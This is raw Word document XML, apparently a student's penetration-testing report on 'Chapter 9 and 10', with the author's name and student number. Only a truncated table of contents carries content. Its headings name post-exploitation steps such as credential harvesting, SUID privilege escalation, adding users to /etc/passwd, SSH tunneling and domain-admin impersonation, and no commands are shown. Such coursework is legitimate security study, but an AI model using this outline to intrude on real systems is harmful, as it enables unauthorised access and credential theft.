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BB9A5" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="390" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="0F4761"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036DCC4E" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="390" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="0F4761"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26438C40" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="387" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="0F4761"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08684AC5" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="390" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="0F4761"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51112FD4" w14:textId="77777777" w:rsidR="006C3873" w:rsidRDefault="006C3873">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="0F4761"/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03AE51B7" w14:textId="77777777" w:rsidR="006C3873" w:rsidRDefault="006C3873">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="0F4761"/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2409210A" w14:textId="49BD9693" w:rsidR="00582E80" w:rsidRDefault="006C3873">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="0F4761"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Chapter 9 and 10</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="0F4761"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D453C53" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="409" w:lineRule="auto"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ayaan Hirsi 173177221 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D656B08" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000" w:rsidP="006C3873">
      <w:pPr>
        <w:spacing w:after="485"/>
        <w:ind w:left="0" w:right="256" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2026-03-17 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C81D33" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="390" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="0F4761"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3614FAC8" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="390" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="0F4761"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE5888C" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="390" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="0F4761"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B43E0C" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="0F4761"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BD2E60" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA8CE73" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D04E6BF" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036749D4" w14:textId="77777777" w:rsidR="006C3873" w:rsidRDefault="006C3873">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79790C68" w14:textId="77777777" w:rsidR="006C3873" w:rsidRDefault="006C3873">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62B07847" w14:textId="77777777" w:rsidR="006C3873" w:rsidRDefault="006C3873">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EDCFCF1" w14:textId="77777777" w:rsidR="006C3873" w:rsidRDefault="006C3873">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="478A7493" w14:textId="77777777" w:rsidR="006C3873" w:rsidRDefault="006C3873">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="157DB64F" w14:textId="77777777" w:rsidR="006C3873" w:rsidRDefault="006C3873">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0015067B" w14:textId="094657E7" w:rsidR="00582E80" w:rsidRDefault="00582E80">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="779218095"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="41A64F09" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
          <w:pPr>
            <w:spacing w:after="234" w:line="259" w:lineRule="auto"/>
            <w:ind w:left="-5" w:right="0"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:i/>
              <w:color w:val="0F4761"/>
              <w:sz w:val="36"/>
            </w:rPr>
            <w:t xml:space="preserve">Table of Contents </w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="2432E882" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
          <w:pPr>
            <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
            <w:ind w:left="0" w:right="0" w:firstLine="0"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:color w:val="0F4761"/>
              <w:sz w:val="32"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="500E9B57" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9619"/>
            </w:tabs>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc30407">
            <w:r>
              <w:t>Table Checklist</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc30407 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">5 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5B6A49D2" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9619"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30408">
            <w:r>
              <w:t>Introduction</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc30408 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">8 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="179EE8BD" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9619"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30409">
            <w:r>
              <w:t>Overview</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc30409 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">8 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="46536045" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9619"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30410">
            <w:r>
              <w:t>Chapter 9</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc30410 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">9 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="07A10718" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9619"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30411">
            <w:r>
              <w:t>9.1 Maintaining reliable re-entry with cron jobs</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc30411 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">10 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4799D6E5" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9619"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30412">
            <w:r>
              <w:t>Creating a SSH Key Pair</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc30412 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">11 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="73D5EB5A" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9619"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30413">
            <w:r>
              <w:t>9.1.3 Tunneling Through SSH</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc30413 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">13 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="70B2C591" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9619"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30414">
            <w:r>
              <w:t>Automating an SSH Tunnel with Cron</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc30414 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">16 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="15523ED8" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9619"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30415">
            <w:r>
              <w:t>9.2 Harvesting Credentials</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc30415 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">17 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0F419EFE" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9619"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30416">
            <w:r>
              <w:t>Harvesting credentials from bash history</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc30416 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">18 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="637D246D" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9619"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30417">
            <w:r>
              <w:t>Harvesting Password Hashes</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc30417 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">19 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="52EB659A" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9619"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30418">
            <w:r>
              <w:t>9.3 Escalating Privileges with SUID Binaries</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc30418 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">20 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2BA5B663" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9619"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30419">
            <w:r>
              <w:t>Inserting a new user into /etc/passwd</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc30419 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">21 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0F52CDF5" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9619"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30420">
            <w:r>
              <w:t>9.4 Passing Around SSH Keys</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc30420 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">23 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="76B3E93F" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9619"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30421">
            <w:r>
              <w:t>Chapter 10</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc30421 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">26 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6F080D65" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9619"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30422">
            <w:r>
              <w:t>10.1 Identifying domain admin user accounts</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc30422 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">27 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="22F6D11B" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9619"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30423">
            <w:r>
              <w:t>10.1.1 Using net to query Active Directory groups</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc30423 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">27 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="71C0C48F" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9619"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30424">
            <w:r>
              <w:t>10.1.2 Locating Logged-in Domain Admin Users</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc30424 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">28 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0B41944B" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9619"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30425">
            <w:r>
              <w:t>10.2 Obtaining Domain Admin Privileges</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc30425 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">28 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6DE2BBEA" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9619"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30426">
            <w:r>
              <w:t>10.2 Obtaining domain admin privileges</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc30426 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">29 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2E4FE277" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9619"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30427">
            <w:r>
              <w:t>10.2.1 Impersonating Logged-In Users with Incognito</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
